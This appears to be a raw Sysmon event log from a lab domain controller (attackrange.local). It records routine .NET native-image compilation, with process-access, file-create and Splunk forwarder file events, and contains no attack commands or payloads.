21:04:59.067{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FB-60D3-2804-00000000CF01}5308C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:59.051{4DB9351A-A1FB-60D3-2704-00000000CF01}3948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f6c-0\Microsoft.WSMan.Runtime.dll2021-06-23 21:04:59.051 10341000x800000000000000021218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.020{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FB-60D3-2704-00000000CF01}3948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.005{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FB-60D3-2704-00000000CF01}3948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.005{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FB-60D3-2704-00000000CF01}3948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.926{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FC-60D3-2B04-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.895{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FC-60D3-2B04-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.895{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FC-60D3-2B04-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:00.755{4DB9351A-A1FB-60D3-2904-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15b8-0\MIGUIControls.dll2021-06-23 21:05:00.755 23542300x800000000000000021237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.677{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=079123BBF5982CE2BA28BA11EE664B09,SHA256=E0C858EA6262784E2F1C26CD45172135744969594951BEAB6C957C5EF353F762,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.567{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7796D54D492669855FA59AD5B55848F,SHA256=8D3B346EC384C07C53812483FB8C7BBA2E12D1BF94728CD7F97B6BCCAD86B89F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.989{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FD-60D3-2D04-00000000CF01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.958{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FD-60D3-2D04-00000000CF01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.958{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FD-60D3-2D04-00000000CF01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.923{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F14620E5A8B5051E4AE62BBC36674D2,SHA256=93EA22DC66B1EF8FE507368B244D974139650DEDAA3693875C7B21A09868FD07,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:01.864{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15ac-0\MMCEx.dll2021-06-23 21:05:01.864 23542300x800000000000000021245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.645{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=089A549C71C3095B22B888D0B28A415F,SHA256=236BB02CBEA0081D9401624D94E1D371D98EF0CBFF292F67C6F24EB87846D201,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.036{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.973{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.973{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.973{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CEE70B70F4DCA6C830D5033BF6F533D5,SHA256=AAEDC3481EF589BD52D1AA626B900B2157F0130E8A2931BB92DEE2BD915A19F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.958{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-3104-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.942{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-3104-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.942{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-3104-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:05:02.882{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\154c-0\MSBuild.exe2021-06-23 21:05:02.882 23542300x800000000000000021261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.661{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=451A7FFCF5A9A7D89D63577A6D4CF850,SHA256=874C8941B65D07B4428338E354CB50D3CC28D9215E045988FB6FCAEA2FC35B95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.536{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.489{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.489{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows